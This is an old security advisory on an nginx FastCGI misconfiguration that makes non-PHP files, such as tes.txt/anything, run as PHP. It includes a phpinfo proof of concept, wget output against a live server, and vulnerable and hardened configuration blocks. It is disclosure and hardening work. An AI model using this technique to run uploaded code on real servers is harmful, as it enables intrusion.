Another wrong (non-default) nginx configuration, found by: Ev1lut10n
===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves, superman, cakill, ketek and all Chinese and Indonesians and all my bros
===========================

Yes, this is another configuration that triggers a hole. It is a bit different from the one reported by 80sec (http://www.80sec.com/nginx-securit.html).

Consider a FastCGI setting in nginx.conf like this (just an example):

============
fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
if (!-e $request_filename) {
    rewrite ^(.+)$ /index.php?q=$1 last;
}
===========

where /home/any_user/public_html can be any path. This is a non-default nginx configuration. With it, a request for a file of any extension followed by an extra path component (file.extension/any_string) is treated as a PHP script, e.g. test.txt/any_string_without_php_extension. Nothing restricts the FastCGI handoff to .php URIs, and $fastcgi_script_name carries the whole request URI into SCRIPT_FILENAME.

As an example, here we have a text file in /home/user/www:

==========================
root@host [/home/any_user_and_path/www]# cat tes.txt
<?php phpinfo();?>
====================

Any request for that tes.txt of the form

==============================
http://domain.com/tes.txt/any_string_without_php_extension
=============================

will be executed as a PHP script.

The 80sec article suggests a patch, either in nginx.conf:

if ( $fastcgi_script_name ~ \..*\/.*php ) {
    return 403;
}

or in php.ini:

cgi.fix_pathinfo=0

Unfortunately this does not fix the hole when you have the wrong configuration above. Note that the nginx rule only returns 403 when the path after the file's dot contains "php" somewhere after a slash, so a URI such as /tes.jpg/any_string_without_extension never matches it. As I checked, the request is still treated as a PHP script:

===========
root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI.  PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00--  http://***********.net/tes.jpg/any_string_without_extension
           => `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=> ] 46,064        --.--K/s

08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]

root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
<a href="http://www.php.net/"><img border="0" src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.2.17</h1>
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
<tr><td class="e">safe_mode</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_exec_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">safe_mode_gid</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_include_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">sql.safe_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
<tr><td class="e">safe_mode_allowed_env_vars</td><td class="v">PHP_</td><td class="v">PHP_</td></tr>
<tr><td class="e">safe_mode_protected_env_vars</td><td class="v">LD_LIBRARY_PATH</td><td class="v">LD_LIBRARY_PATH</td></tr>
root@host [/usr/local/nginx/conf]#
=================================================

Trust me, you must be very careful when you set up nginx and FastCGI: a small mistake in the config will open a hole on your server.
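As an added example (not part of the original advisory), here is a server block carrying the kind of configuration described above, placed next to a hardened version that only hands .php URIs to FastCGI and refuses them unless the script file itself exists. The server_name, the document root and the 127.0.0.1:9000 FastCGI upstream are assumptions.

```nginx
# --- VULNERABLE: every request, whatever its extension, reaches PHP ---
server {
    listen 80;
    server_name domain.com;                      # assumed
    root /home/any_user/public_html;             # assumed

    location / {
        if (!-e $request_filename) {
            rewrite ^(.+)$ /index.php?q=$1 last;
        }
        # No extension check: /tes.txt/anything is passed to PHP with
        # SCRIPT_FILENAME=/home/any_user/public_html/tes.txt/anything
        fastcgi_pass 127.0.0.1:9000;             # assumed upstream
        fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
        include fastcgi_params;
    }
}

# --- HARDENED: only *.php URIs reach PHP, and only if the file exists ---
server {
    listen 80;
    server_name domain.com;                      # assumed
    root /home/any_user/public_html;             # assumed
    index index.php;

    location / {
        # Front-controller routing without "if": serve the static file if it
        # exists, otherwise route to index.php. tes.txt is served as text,
        # never executed.
        try_files $uri $uri/ /index.php?q=$uri;
    }

    # Regex anchored at end of URI: /tes.txt/foo does not match.
    location ~ \.php$ {
        # Return 404 unless the .php file itself is on disk, so
        # /tes.txt/x.php (no such file) is never passed to FastCGI.
        try_files $uri =404;
        fastcgi_pass 127.0.0.1:9000;             # assumed upstream
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }

    # If the application needs PATH_INFO (/script.php/extra), use this
    # variant instead of the block above; it still 404s when script.php
    # does not exist:
    #
    # location ~ [^/]\.php(/|$) {
    #     fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    #     try_files $fastcgi_script_name =404;
    #     fastcgi_param PATH_INFO $fastcgi_path_info;
    #     fastcgi_pass 127.0.0.1:9000;
    #     fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    #     include fastcgi_params;
    # }
}
```

To verify, upload a text file containing `<?php phpinfo(); ?>` as tes.txt and request /tes.txt/x: under the first block the response is phpinfo output, under the second it is not, because nginx never hands tes.txt to PHP. Keep cgi.fix_pathinfo=0 in php.ini as well, and remember that php.ini is read when the PHP CGI/FastCGI processes start, so restart those processes, not only nginx, after changing it.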